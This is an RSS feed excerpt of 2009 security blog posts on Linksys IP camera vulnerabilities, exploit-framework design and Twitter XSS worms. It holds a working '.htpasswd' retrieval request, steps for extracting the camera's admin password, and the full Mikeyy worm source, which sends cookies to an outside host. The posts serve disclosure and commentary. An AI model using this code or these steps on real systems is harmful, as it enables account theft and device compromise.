         <description>This article is a continuation of the following GNUCITIZEN article, which includes an introduction to the topic and also some initial observations: Hacking Linksys IP Cameras (pt 1). Privilege escalation via arbitrary file retrieval The second vulnerability I&amp;#8217;ll be releasing is an arbitrary(ish) file retrieval vulnerability. It&amp;#8217;s not fully arbitrary because you can only retrieve the contents of files located within the same directory where the vulnerable CGI program is located. [...]</description>
         <guid isPermaLink="false">https://www.gnucitizen.org/?p=2978</guid>
         <pubDate>Mon, 20 Apr 2009 15:27:14 -0700</pubDate>
         <content:encoded><![CDATA[<p><em>This article is a continuation of the following GNUCITIZEN article, which includes an introduction to the topic and also some initial observations: <q><a rel="nofollow" target="_blank" href="http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-1/">Hacking Linksys IP Cameras (pt 1)</a></q>.</em></p> <h3>Privilege escalation via arbitrary file retrieval</h3> <p>The second vulnerability I&#8217;ll be releasing is an arbitrary(ish) file retrieval vulnerability. It&#8217;s not fully arbitrary because you can only retrieve the contents of files located within the same directory where the vulnerable CGI program is located. However, this is enough to allow a neat privilege escalation vector where a restricted user who only has permissions to view the video stream can gain access to the <code>admin</code> account password.</p> <div class="screen"><a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/adselwood/2724733530/"><img src="http://farm4.static.flickr.com/3095/2724733530_1d7c6b12b0.jpg?v=0" title="Fire Surveillance HDR"/></a></div> <p>The problem lies within the <code>next_file</code> parameter which is submitted to the <code>main.cgi</code> program. Although <code>main.cgi</code> <em>does</em> filter characters typically used in directory traversal sequences such as dots (<code>.</code>) and forward slashes (<code>/</code>), it seems that the developer didn&#8217;t consider that retrieving the contents of files within the current directory could create a security hole. By simply retrieving the contents of <code>.htpasswd</code> a restricted user who only has permissions to access the video stream can access the credentials of the <code>admin</code> account and also the credentials of other restricted users (if applicable).</p> <p>The only restriction that needs to be bypassed is the filtering of dot (<code>.</code>) symbols, i.e. the following will <em>not</em> work and will result in a forbidden error:</p> <pre><code>/img/main.cgi?next_file=.htpasswd</code></pre> <p>But replacing the dot (<code>.</code>) symbol with its hexadecimal equivalent:</p> <pre><code>/img/main.cgi?next_file=%2ehtpasswd</code></pre> <p>will result in the contents of <code>.htpasswd</code> being returned, i.e.:</p> <pre><code>admin:adminpassw0rd
user1:pass1
user2:pass2</code></pre> <p>Like most IP cameras, the Linksys WVC54GCA allows administrators to grant access to the video stream to selected users only (rather than anonymous users who don&#8217;t need to authenticate). In this case, the admin user can click on the <code>Users</code> menu and tick the <code>Only users in database</code> option (please see screenshot below). After this, all that is needed is to add a username/password pair for the account to grant video-viewing access to:</p> <div class="screen"><img src="http://www.gnucitizen.org/static/blog/2009/04/video_user_accounts.png" alt="Video User Accounts" title="Video User Accounts" width="489" height="227" class="alignnone size-full wp-image-2990"/></div> <p>Well, the feature discussed above can be rendered useless by exploiting the vulnerability I have described, since it allows restricted users to retrieve the admin password.</p> <h3>Testing Info</h3> <p>Successfully tested on:</p>
<p><ul>
<li>WVC54GCA</li>
<li>Firmware V1.00R22 and V1.00R24 (latest available as on 20th April 2009)</li>
</ul> <p><em>Please note that this vulnerability is different to <a rel="nofollow" target="_blank" href="http://www.securityfocus.com/bid/10476/exploit">BID 10476</a> which affected the <code>/main.cgi</code> program rather than <code>/img/main.cgi</code>.</em></p>]]></content:encoded>
      </item>
      <item>
         <title>Hacking Linksys IP Cameras (pt 1)</title>
         <link>http://feedproxy.google.com/~r/gnucitizen/~3/L70Pxgeh0oI/</link>
         <description>During the Easter break, I was playing with my wireless Linksys IP camera which, although I bought several months ago, I hadn&amp;#8217;t taken my time to give the attention this beauty deserves until now! :) The model in particular is the WVC54GCA, which I would say is one of the most affordable Wi-Fi IP cameras out there (about GBP 80 in the UK), making it a great toy to tinker with. [...]</description>
         <guid isPermaLink="false">https://www.gnucitizen.org/?p=2899</guid>
         <pubDate>Mon, 20 Apr 2009 00:40:35 -0700</pubDate>
         <content:encoded><![CDATA[<p>During the Easter break, I was playing with my wireless Linksys IP camera which, although I bought several months ago, I hadn&#8217;t taken my time to give the attention this beauty deserves until now! :)</p> <p>The model in particular is the <a rel="nofollow" target="_blank" href="http://www.linksysbycisco.com/US/en/products/WVC54GCA">WVC54GCA</a>, which I would say is one of the most affordable Wi-Fi IP cameras out there (about GBP 80 in the UK), making it a great toy to tinker with.</p> <div class="screen"><a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/joachim_s_mueller/747735445/"><img src="http://farm2.static.flickr.com/1008/747735445_40437249ec.jpg?v=0" title="Surveillance"/></a></div> <p>I found the camera to be quite good functionalities-wise, although I&#8217;ve experienced availability problems with it. It seems the camera freezes every once in a while. Well, this is true at least when you have heavily customized its configuration, which is what I&#8217;ve ultimately done after playing so much with it.</p> <p>I&#8217;ve loved playing with embedded devices for a while, and as a security researcher I find it quite an interesting topic as many <q>de facto</q> security principles that are usually (attempted to be) followed when designing other types of systems are <em>not</em> often applied to embedded devices. This, I believe, is due to lack of limitations in hardware resources, and lack of awareness on consequences of getting a miscellaneous device compromised. i.e.: <q>who cares if my IP camera gets owned?</q></p> <p><em>During the next days, I&#8217;ll be posting some vulnerabilities I&#8217;ve found. Some of them are fun and serious, while others you might find kind of boring</em>.</p> <h3>Meet the target</h3> <p>You can learn a lot about the specs of a device by simply reading the product&#8217;s literature. However, sometimes not enough info is provided in these documents. 
The following are some of the specs I confirmed by interacting with the camera in various ways:</p> <ul>
<li>CPU: <code>Faraday FA526id(wb) rev 1 (v4l)</code> according to <code>/proc/cpuinfo</code></li>
<li>OS: <code>Linux version 2.4.19-pl1029</code> according to <code>/proc/version</code> plus Busybox (confirmed as the file <code>/bin/busybox</code> exists on the filesystem)</li>
<li>HTTPD: <code>thttpd 2.25b</code> (extracted from banner returned on default html error pages and &#8216;Server:&#8217; HTTP headers)</li>
<li>Memory: 30908 kB (32 MB?) according to <code>/proc/meminfo</code></li>
<li>Firmware Version: V1.00R22 and <a rel="nofollow" target="_blank" href="http://downloads.linksysbycisco.com/downloads/WVC54GCA_FW_100R24,0.zip">V1.00R24</a> (latest version available as on 16th April 2009)</li>
</ul> <p>It also comes with a telnet daemon (<code>/usr/sbin/telnetd</code>) but unfortunately for hackers out there, the daemon is disabled as the following line is commented out on <code>/etc/init.d/rcS</code>:</p> <pre><code># ---- Start Telnet Server (debug) ---- #<br />
#/usr/sbin/telnetd &#038;</code></pre> <p>I have not yet managed to get a remote root shell by enabling the telnet daemon but have found some vulnerabilities which might help accomplish this goal. I will be releasing these vulnerabilities in the next days. Please let me know if you know how to enable the telnet daemon on Linksys IP cameras! Ideally, I&#8217;d like to accomplish this without physically connecting to the camera or flashing the firmware.</p> <h3>Remote admin compromise by unauthenticated attackers due to wizard design error</h3> <p>I found this vulnerability while investigating <a rel="nofollow" target="_blank" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4390">CVE-2008-4390</a>. I wanted to know if CVE-2008-4390 affected my camera, even though it was reported to affect a different Linksys IP camera firmware and model. The CVE entry states:</p> <blockquote>The Cisco Linksys WVC54GC wireless video camera before firmware 1.25 sends cleartext configuration data in response to a Setup Wizard remote-management command, which allows remote attackers to obtain sensitive information such as passwords by sniffing the network.</blockquote> <p>So I started trying to figure out if the WVC54GCA also discloses sensitive information when communicating with the <a rel="nofollow" target="_blank" href="http://downloads.linksysbycisco.com/downloads/WVC54GCA-CD-Content-10-25-2007_SetupWiz.zip">wizard</a>. <a rel="nofollow" target="_blank" href="http://www.kb.cert.org/vuls/id/MAPG-7HJKSA">According to the vendor</a>, the issue has been fixed:</p> <blockquote>Solution: 2300 and 210 have encrypted data and have no such issue. To decode the data, an administrator username/password is a MUST.</blockquote> <p>At first sight, when capturing the traffic between the wizard and the cam, I couldn&#8217;t see the data traveling in human readable form. 
While trying to figure out how the data is sent over the network (i.e.: encoded/encrypted), I realized there was something seriously wrong with the handshake mechanism.</p> <p>The following is a very generic (and possibly inaccurate) description of the handshake:</p> <ol>
<li>Wizard (<code>SetupWizard.exe</code>) sends UDP request to 255.255.255.255:916</li>
<li>Camera responds back to 255.255.255.255 using the <a rel="nofollow" target="_blank" href="http://en.wikipedia.org/wiki/DCE/RPC">DCERPC</a> protocol and presents itself with identity info such as the value of the &#8216;defname&#8217; variable which looks like LKXXXXXX, where &#8216;X&#8217; is a hex digit. This identity info is picked up by <code>SetupWizard.exe</code>. Some of this info such as MAC address, IP address and subnet mask is shown in the wizard.</li>
<li>From now on, <code>SetupWizard.exe</code> uses the camera&#8217;s &#8216;defname&#8217; variable when talking to it, so that the camera knows what requests submitted to 255.255.255.255:916 it should respond to.</li>
</ol> <p>At this point the wizard &#8220;has discovered&#8221; the camera and the user can go through the setup procedure. For security reasons, the user needs to enter the admin username and password before the setup process can start. Otherwise anyone could make changes to the camera without authenticating.</p> <p>Now, here is the important bit. If you capture the network traffic while running <code>SetupWizard.exe</code>, you&#8217;ll notice that <strong>when the user is asked to enter the admin username and password after the camera is discovered, there are NO requests sent from the wizard to the camera in order to verify that the entered username/password combination is correct! </strong></p> <p>&#8220;How is this possible? What the heck is going on?!&#8221; I thought. I was terrified to confirm my worst fear: the wizard already &#8220;knows&#8221; the camera&#8217;s admin username and password at this point, thus there is no need to ask the camera again. Indeed, at this point &#8211; <em>before the user enters the admin username and password</em> that is &#8211; the camera&#8217;s credentials are already loaded into the memory of the <code>SetupWizard.exe</code> process. This is because the camera has previously transferred the admin credentials along with other configuration data!</p> <p>In case I didn&#8217;t explain myself properly I&#8217;ll summarize the issue by saying that <strong>the camera transfers the admin username and password to the wizard before the user enters them</strong>.</p> <p>The following steps demonstrate how an unauthenticated attacker can remotely obtain the camera&#8217;s admin username and password:</p> <ol>
<li>Download the <a rel="nofollow" target="_blank" href="http://downloads.linksysbycisco.com/downloads/WVC54GCA-CD-Content-10-25-2007_SetupWiz.zip">setup wizard</a>. You might need to download a different wizard if you want to test this vulnerability on a different Linksys IP camera model</li>
<li>Run <code>SetupWizard.exe</code></li>
<li>Click on &#8220;Click Here to Start&#8221; / &#8220;Setup Camera&#8221; / &#8220;Next&#8221; (after accepting EULA) / &#8220;Next&#8221; (4 more times in total)</li>
<li>The discovery process is quite flaky, so if the wizard hasn&#8217;t found your camera yet, click on &#8220;Search Again&#8221; as many times as required until it works</li>
<li>You should now see your camera&#8217;s name under the &#8220;Camera List&#8221; column and also various configuration data under the &#8220;Status&#8221; column:
<div class="screen"><img src="http://www.gnucitizen.org/static/blog/2009/04/wizard_cam_discovery-300x225.png" alt="Wizard Cam Discovery" title="Wizard Cam Discovery" width="300" height="225" class="alignnone size-medium wp-image-2922"/></div></li>
<li>You now need to dump the process memory of <code>SetupWizard.exe</code> using your favorite <a rel="nofollow" target="_blank" href="http://www.ntsecurity.nu/toolbox/pmdump/">tool</a>:
<div class="screen"><img src="http://www.gnucitizen.org/static/blog/2009/04/setupwizardexe_mem_dump_21-300x166.png" alt="setupwizardexe Mem Dump 2" title="setupwizardexe Mem Dump 2" width="300" height="166" class="alignnone size-medium wp-image-2926"/></div></li>
<li>Then open the memory dump file using your favorite <a rel="nofollow" target="_blank" href="http://www.chmaas.handshake.de/delphi/freeware/xvi32/xvi32.htm">hex editor</a></li>
<li>Now you can either search for &#8220;admin&#8221; and find the admin password after a few null bytes, or tell your hex editor to go to decimal position 75058 (&#8221;Address&#8221; / &#8220;Goto &#8230;&#8221; menu on XVI32). In my case the admin password would always fall within this position:
<div class="screen"><img src="http://www.gnucitizen.org/static/blog/2009/04/admin_password_extraction1-300x217.png" alt="Admin Password Extraction 1" title="Admin Password Extraction 1" width="300" height="217" class="alignnone size-medium wp-image-2945"/>
<img src="http://www.gnucitizen.org/static/blog/2009/04/admin_password_extraction_2-300x216.png" alt="Admin Password Extraction 2" title="Admin Password Extraction 2" width="300" height="216" class="alignnone size-medium wp-image-2947"/></div></li>
<li>Have fun! (the most important step really)</li>
</ol> <p>It is somehow ironic that a free tool provided by the vendor of a product can be used as a &#8220;hacker&#8221; tool against their own product.</p> <p><em>As far as I know, this vulnerability cannot be exploited over the Internet, since the camera only responds to wizards located in the same LAN. Never say never though, so if you find a way to exploit this vulnerability over the Internet, please <a rel="nofollow" target="_blank" href="http://www.gnucitizen.org/contact/">contact</a> us.</em></p> <p>UPDATE: CPU and additional OS info added.</p>]]></content:encoded>
      </item>
      <item>
         <title>It is All About People Manipulation Skills</title>
         <link>http://feedproxy.google.com/~r/gnucitizen/~3/2sj1FfUKA44/</link>
         <description>On the 14th this month, Computerworld published an interesting article titled &amp;#8216;Mafiaboy&amp;#8217; spills the beans at IT360 on underground hackers. Interesting read but nothing too exciting. The article is yet another proof that we are all in big trouble. Simply put, the technology will continue to develop and the majority of people won&amp;#8217;t be able to keep up. As long as the situation remains the same, people and corporations will get exploited regardless of how tight their security is. [...]</description>
         <guid isPermaLink="false">https://www.gnucitizen.org/?p=2955</guid>
         <pubDate>Sun, 19 Apr 2009 02:15:05 -0700</pubDate>
         <content:encoded><![CDATA[<p>On the 14th this month, Computerworld published an interesting <a rel="nofollow" target="_blank" href="http://www.computerworld.com/action/article.do?command=viewArticleBasic&#038;articleId=9131571&#038;source=rss_topic82">article</a> titled <q>&#8216;Mafiaboy&#8217; spills the beans at IT360 on underground hackers</q>. Interesting read but nothing too exciting.</p> <div class="screen"><a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/sreejithk2000/2385193167/"><img src="http://farm3.static.flickr.com/2381/2385193167_b654c17189.jpg?v=1207253004" alt="The crowd"/></a></div> <p>The article is yet another proof that we are all in big trouble. Simply put, the technology will continue to develop and the majority of people won&#8217;t be able to keep up. As long as the situation remains the same, people and corporations will get exploited regardless of how tight their security is. It is inevitable. At the end of the day, it is all about people, not technology.</p> <p><em>Social engineering skills have been a major part of the hacker&#8217;s toolkit for ages and the situation is unlikely to change. 
The humans are still the weakest link and that is something that can only be fixed through education and by continuously raising awareness.</em></p>]]></content:encoded>
      </item>
      <item>
         <title>Mikeyy Returns</title>
         <link>http://blog.blogsecurify.com/2009/04/mikeyy-returns.html</link>
         <description>&lt;a rel="nofollow" target="_blank" href="http://mashable.com/2009/04/17/mikeyy-worm-returns/"&gt;According&lt;/a&gt; to Mashable, the Mikeyy twitter worm has returned.&lt;br /&gt;&lt;br /&gt;&lt;a rel="nofollow" target="_blank" href="http://2.bp.blogspot.com/_9TXLRd-gO5c/Sejrbd8aIsI/AAAAAAAAAJw/gENiZye-i1w/s1600-h/twitter1.jpg"&gt;&lt;img style="cursor:pointer;width:320px;height:219px;" src="http://2.bp.blogspot.com/_9TXLRd-gO5c/Sejrbd8aIsI/AAAAAAAAAJw/gENiZye-i1w/s320/twitter1.jpg" alt="" id="BLOGGER_PHOTO_ID_5325765416492606146" border="0"/&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;I am personally not surprised. Given the ease of finding XSS vectors nowadays it is more surprising that we haven't seen massive XSS outbreaks everywhere.&lt;br /&gt;&lt;br /&gt;XSS attacks and worms will become more and more relevant as the web expands because they are de facto the equivalent of buffer overflows in the software security world.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style:italic;"&gt;I think that talked about this stuff 4-5 years ago.&lt;/span&gt;</description>
         <author>noreply@blogger.com (pdp)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-443511708867239838.post-6875339143197705536</guid>
         <pubDate>Fri, 17 Apr 2009 13:44:00 -0700</pubDate>
         <media:thumbnail width="72" url="http://2.bp.blogspot.com/_9TXLRd-gO5c/Sejrbd8aIsI/AAAAAAAAAJw/gENiZye-i1w/s72-c/twitter1.jpg" height="72" />
      </item>
      <item>
         <title>Exploit Development Framework Design</title>
         <link>http://feedproxy.google.com/~r/gnucitizen/~3/_jDJKjbFqeo/</link>
         <description>Perl, Ruby, Python: use the language that suits your character. However, one of the things that differentiate python from the rest is its philosophy, which is: there should be one&amp;#8211; and preferably only one &amp;#8211;obvious way to do it (where it is a problem). This philosophy gives python some interesting advantages over other similar languages. That will be explained later on. [...]</description>
         <guid isPermaLink="false">https://www.gnucitizen.org/?p=2881</guid>
         <pubDate>Thu, 16 Apr 2009 02:40:15 -0700</pubDate>
         <content:encoded><![CDATA[<p>Perl, Ruby, Python: use the language that suits your character. However, one of the things that differentiate python from the rest is its philosophy, which is: <q>there should be one&#8211; and preferably only one &#8211;obvious way to do it</q> (where <q>it</q> is <q>a problem</q>). This philosophy gives python some interesting advantages over other similar languages. That will be explained later on.</p> <div class="screen"><a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/schoffer/196079076/"><img src="http://farm1.static.flickr.com/76/196079076_ef3d5172dc.jpg?v=0" alt="graz - graffiti :: monty python"/></a></div> <p>This post is merely a summary of my research work on how to build a better exploitation framework ala <a rel="nofollow" target="_blank" href="http://www.metasploit.com">metasploit</a>-style.</p> <h3>The Problem</h3> <p>Metasploit is great but there are three things that make the framework sometimes inconvenient: its size, its dependency on the ruby platform and of course its speed. It will be great if for example we can take a single exploit (or a set of exploits) out of the framework and compile it into a standalone executable. On the advantage side, this type of solution will also allow us to ship the framework as a payload to already compromised systems and use it from there as a stepping stone for further propagation. It will also allow us to run exploits from compromised embedded devices as long as we can compile for their architecture, which is pretty cool.</p> <div class="message">I understand that it is possible to bundle the entire framework plus the ruby environment into one executable but such a solution is simply not elegant enough and not fully cross-platform.</div> <h3>Introduction</h3> <p>Back in the days when Metasploit was written in Perl, there were a few other frameworks trying to do similar things but in C and C++. 
A solution based on C or C++ is a lot more interesting as it allows us to compile standalone versions of the framework and use them as we wish. It simply makes the framework very good for embedding and also quite suitable for delivering it as a payload to the systems we would like to compromise.</p> <p>Nowadays, a C and C++ solution is often doomed to failure. The reason for this is that when building a framework you can easily get into a situation where you need to solve a pretty complicated problem. Both C and C++ lack the dynamism and the degree of expression available in languages such as perl, python and ruby and therefore, while they remain very suitable for low level stuff, they start to lose ground when you need to build something that is more abstract and high level.</p> <h3>Some Solutions</h3> <p>Keeping all of the above in mind I started putting words into practice. In the spirit of a zen monk, I started thinking which parts of the metasploit framework are most valuable to a penetration tester so that they can be branched out. As it happens, the obvious answer is: <q>the exploits</q>. The <q>Auxiliary</q> modules are great but they represent functionalities which are already available in other tools. So, the first idea was to take the exploits and payloads out and rewrite them into something that is more suitable.</p> <p>I decided to see for myself if I can prototype a simple exploitation framework in C++ where all it should do is implement several abstract interfaces for exploit development, a class with common methods for payloads (empty of course) and of course a simple interface to run an exploit with a payload against a target. 
All of this was achieved in a <q>hello world</q> fashion exploiting a simple stack overflow on a proggie from the command line and of course without the need to circumvent any protection mechanisms in place.</p> <p>Although I was pleased with the result of the prototype, I was not convinced that this is a good enough solution. Programming in C++ is fun, especially when you haven&#8217;t done it for a couple of years, but still not as practical as I would like it to be. We can most certainly build a DSL on top of C and C++ by using preprocessor directives but when you are developing an exploit you want to make the process as painless as possible and C directives only make it worse when hunting for a bug in the exploit. Not to mention that compiling something every time you make a change is not cool at all.</p> <p>Being a pythonist and knowing the python mantra inside out, I thought that it should be possible to write all of the exploits and payloads in python and convert them into C or C++ at a later stage as long as I stick to using a minimal set of the language features which can be directly translated with regexes and some basic parsing. After all, python looks like executable pseudocode. Luckily for me, such a solution already exists and it is called <a rel="nofollow" target="_blank" href="http://code.google.com/p/shedskin/">shedskin</a>.</p> <p>Now shedskin is a lot more than a simple python to C++ translator. Not only can it convert a python program to C++ source but it also implements all of python&#8217;s builtins and it has support for some of python&#8217;s most useful modules such as <code>re</code> and <code>socket</code>. On top of that, it is trivial to implement additional modules for the shedskin framework in python. <em>This is a product I will happily pay for!</em></p> <h3>Analysis</h3> <p>I played quite a lot with the shedskin compiler tweaking things as I go. 
Although the parser is pretty advanced there are some restrictions enforced on the language. All of them are nicely covered in the shedskin tutorial.</p> <p>It was time to see if I do need the advanced python features for developing the exploits. I ran through all Metasploit payloads and exploits and a pattern started to emerge. The majority of the exploits were pretty basic. They all came down to the following algorithm more or less:</p> <ol>
<li>Select an exploit</li>
<li>Pack a structure/payload that will be sent over a socket or will be dumped into a file</li>
<li>Send/Save the payload</li>
</ol> <p>Obviously, there is no need for python sugar to implement that.</p> <h3>The Design</h3> <p>I did quite a lot of work investigating the best approach to tackle the problem of creating a good enough exploitation framework and I came up with the following basic idea:</p> <p>We start with the same basic building blocks as found in metasploit. We need abstract classes for Exploits and Shellcodes and also classes that implement them to define more functional classes, such as those needed when writing remote exploits (socket stuff). We use the basic python capabilities keeping shedskin in mind. As I mentioned, shedskin is quite advanced so most of the functionality can be implemented without even taking it into consideration at all.</p> <p>That will provide the core of the framework. All of the exploits can now be written on top of this. The exploits themselves should reuse as many of the builtin methods as possible so that their portability is guaranteed.</p> <p>A layer above that, we write as much python sugar as we want. We simply don&#8217;t care how we are going to write it because that part of the framework doesn&#8217;t have to be compiled.</p> <p>In summary, we layer the whole thing like this:</p> <ul>
<li><strong>Layer 01.</strong> Core Exploit Development Classes implementing the most basic set of python features</li>
<li><strong>Layer 02.</strong> Exploits implementing the Core Exploit Development Classes</li>
<li><strong>Layer 03.</strong> Python sugar to glue it all together</li>
</ul> <h3>Conclusion</h3> <p>So, it is possible to write a good and well-designed exploitation framework in python that allows exploits to be separated and compiled into standalone native executables. Not only that, but we do not sacrifice the dynamism of the python language: while the core will be written in basic python, the rest will be as dynamic as we want. Imho, this is all possible due to python&#8217;s mantra that <q>there should be one&#8211; and preferably only one &#8211;obvious way to do it</q>. It just makes it easier to write brilliant tools such as shedskin.</p> <div class="message">Although I am quite excited to start writing such a beast right away, I am going to <code>pass</code> this time. I am starting to learn to say <q>NO</q> because I&#8217;ve got far too many things on my plate already. However, if anyone is interested in working on this, I will be very happy to facilitate the project as much as I can and give a hand where necessary.</div> <p><em>I am very interested to hear your opinion and I am even more interested to get the opinion of the Metasploit team as they have a lot more experience in coding exploitation frameworks than me.</em></p>]]></content:encoded>
      </item>
      <item>
         <title>Twitter Worm</title>
         <link>http://blog.blogsecurify.com/2009/04/twitter-worm.html</link>
         <description>As I've already &lt;a rel="nofollow" target="_blank" href="http://www.gnucitizen.org/blog/even-more-xss-worms/"&gt;mentioned&lt;/a&gt; on the &lt;a rel="nofollow" target="_blank" href="http://www.gnucitizen.org"&gt;GNUCITIZEN&lt;/a&gt; blog, Twitter has been hit by the same worm twice. The worm is similar in nature to the infamous Samy XSS Worm which hit MySpace in 2005 but a lot less severe. This is yet another example that XSS worms could and will be used as a propagation mechanism for more severe types of malware.&lt;br /&gt;&lt;br /&gt;For those who are curious, here is the complete worm code:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;pre&gt;&lt;code&gt;function XHConn()&lt;br /&gt;{&lt;br /&gt; var xmlhttp, bComplete = false;&lt;br /&gt; try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }&lt;br /&gt; catch (e) { try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }&lt;br /&gt; catch (e) { try { xmlhttp = new XMLHttpRequest(); }&lt;br /&gt; catch (e) { xmlhttp = false; }}}&lt;br /&gt; if (!xmlhttp) return null;&lt;br /&gt; this.connect = function(sURL, sMethod, sVars, fnDone)&lt;br /&gt; {&lt;br /&gt; if (!xmlhttp) return false;&lt;br /&gt; bComplete = false;&lt;br /&gt; sMethod = sMethod.toUpperCase();&lt;br /&gt; try {&lt;br /&gt; if (sMethod == "GET")&lt;br /&gt; {&lt;br /&gt; xmlhttp.open(sMethod, sURL+"?"+sVars, true);&lt;br /&gt; sVars = "";&lt;br /&gt; }&lt;br /&gt; else&lt;br /&gt; {&lt;br /&gt; xmlhttp.open(sMethod, sURL, true);&lt;br /&gt; xmlhttp.setRequestHeader("Method", "POST "+sURL+" HTTP/1.1");&lt;br /&gt; xmlhttp.setRequestHeader("Content-Type",&lt;br /&gt; "application/x-www-form-urlencoded");&lt;br /&gt; }&lt;br /&gt; xmlhttp.onreadystatechange = function(){&lt;br /&gt; if (xmlhttp.readyState == 4 &amp;&amp; !bComplete)&lt;br /&gt; {&lt;br /&gt; bComplete = true;&lt;br /&gt; fnDone(xmlhttp);&lt;br /&gt; }};&lt;br /&gt; xmlhttp.send(sVars);&lt;br /&gt; }&lt;br /&gt; catch(z) { return false; }&lt;br /&gt; return 
true;&lt;br /&gt; };&lt;br /&gt; return this;&lt;br /&gt;}&lt;br /&gt; &lt;br /&gt;function urlencode( str ) {&lt;br /&gt; var histogram = {}, tmp_arr = [];&lt;br /&gt; var ret = str.toString();&lt;br /&gt; &lt;br /&gt; var replacer = function(search, replace, str) {&lt;br /&gt; var tmp_arr = [];&lt;br /&gt; tmp_arr = str.split(search);&lt;br /&gt; return tmp_arr.join(replace);&lt;br /&gt; };&lt;br /&gt; &lt;br /&gt; histogram["'"] = '%27';&lt;br /&gt; histogram['('] = '%28';&lt;br /&gt; histogram[')'] = '%29';&lt;br /&gt; histogram['*'] = '%2A';&lt;br /&gt; histogram['~'] = '%7E';&lt;br /&gt; histogram['!'] = '%21';&lt;br /&gt; histogram['%20'] = '+';&lt;br /&gt; &lt;br /&gt; ret = encodeURIComponent(ret);&lt;br /&gt; &lt;br /&gt; for (search in histogram) {&lt;br /&gt; replace = histogram[search];&lt;br /&gt; ret = replacer(search, replace, ret)&lt;br /&gt; }&lt;br /&gt; &lt;br /&gt; return ret.replace(/(&amp;#92;%([a-z0-9]{2}))/g, function(full, m1, m2) {&lt;br /&gt; return "%"+m2.toUpperCase();&lt;br /&gt; });&lt;br /&gt; &lt;br /&gt; return ret;&lt;br /&gt;}&lt;br /&gt; &lt;br /&gt;var content = document.documentElement.innerHTML;&lt;br /&gt;userreg = new RegExp(/&amp;lt;meta content="(.*)" name="session-user-screen_name"/g);&lt;br /&gt;var username = userreg.exec(content);&lt;br /&gt;username = username[1];&lt;br /&gt; &lt;br /&gt;var cookie;&lt;br /&gt;cookie = urlencode(document.cookie);&lt;br /&gt;document.write("&amp;lt;img src='http://mikeyylolz.uuuq.com/x.php?c=" + cookie + "&amp;username=" + username + "'&amp;gt;");&lt;br /&gt;document.write("&amp;lt;img src='http://stalkdaily.com/log.gif'&amp;gt;");&lt;br /&gt; &lt;br /&gt;function wait()&lt;br /&gt;{&lt;br /&gt; var content = document.documentElement.innerHTML;&lt;br /&gt; &lt;br /&gt; authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);&lt;br /&gt; var authtoken = authreg.exec(content);&lt;br /&gt; authtoken = authtoken[1];&lt;br /&gt; //alert(authtoken);&lt;br /&gt; &lt;br /&gt; var 
randomUpdate=new Array();&lt;br /&gt; randomUpdate[0]="Dude, www.StalkDaily.com is awesome. What's the fuss?";&lt;br /&gt; randomUpdate[1]="Join www.StalkDaily.com everyone!";&lt;br /&gt; randomUpdate[2]="Woooo, www.StalkDaily.com :)";&lt;br /&gt; randomUpdate[3]="Virus!? What? www.StalkDaily.com is legit!";&lt;br /&gt; randomUpdate[4]="Wow...www.StalkDaily.com";&lt;br /&gt; randomUpdate[5]="@twitter www.StalkDaily.com";&lt;br /&gt; &lt;br /&gt; var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)];&lt;br /&gt; &lt;br /&gt; updateEncode = urlencode(genRand);&lt;br /&gt; &lt;br /&gt; var xss = urlencode('http://www.stalkdaily.com"&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;script src="http://mikeyylolz.uuuq.com/x.js"&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;a ');&lt;br /&gt; &lt;br /&gt; var ajaxConn = new XHConn();&lt;br /&gt; ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&amp;status="+updateEncode+"&amp;tab=home&amp;update=update");&lt;br /&gt; var ajaxConn1 = new XHConn();&lt;br /&gt; ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&amp;user[url]="+xss+"&amp;tab=home&amp;update=update");&lt;br /&gt;}&lt;br /&gt;setTimeout("wait()",3250);&lt;/code&gt;&lt;/pre&gt;&lt;/blockquote&gt;</description>
         <author>noreply@blogger.com (pdp)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-443511708867239838.post-1725322013378363770</guid>
         <pubDate>Wed, 15 Apr 2009 01:41:00 -0700</pubDate>
      </item>
      <item>
         <title>Even More XSS Worms</title>
         <link>http://feedproxy.google.com/~r/gnucitizen/~3/xg_PlnFWsew/</link>
         <description>This morning I spotted several blog posts mentioning that Twitter has been hit by yet another XSS worm. There is no merit in discussing how this has been done and for what purposes but this incident is yet another proof that the attack landscape is rapidly changing and moving towards web enabled infrastructures and the client-side. [...]</description>
         <guid isPermaLink="false">https://www.gnucitizen.org/?p=2858</guid>
         <pubDate>Sun, 12 Apr 2009 01:29:41 -0700</pubDate>
         <content:encoded><![CDATA[<p>This morning I spotted <a rel="nofollow" target="_blank" href="http://www.techcrunch.com/2009/04/11/twitter-hit-by-stalkdaily-worm/">several blog posts</a> mentioning that Twitter has been hit by yet another XSS worm.</p> <div class="screen"><a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/trinnity/2909816334/"><img src="http://farm4.static.flickr.com/3081/2909816334_8cd7c9972a.jpg?v=0" alt="Mark's Twitter Friends"/></a></div> <p>There is no merit in discussing how this has been done and for what purposes but this incident is yet another proof that the attack landscape is rapidly changing and moving towards web enabled infrastructures and the client-side. Sooner or later almost every website will be equipped with social capabilities (google&#8217;s own opensocial and friendconnect platforms) and then simple persistent XSS attacks will turn into quite nasty problems.</p> <p><em>Time will tell!</em></p>]]></content:encoded>
      </item>
      <item>
         <title>Tools of Trade</title>
         <link>http://feedproxy.google.com/~r/gnucitizen/~3/o6_JqQcAlGk/</link>
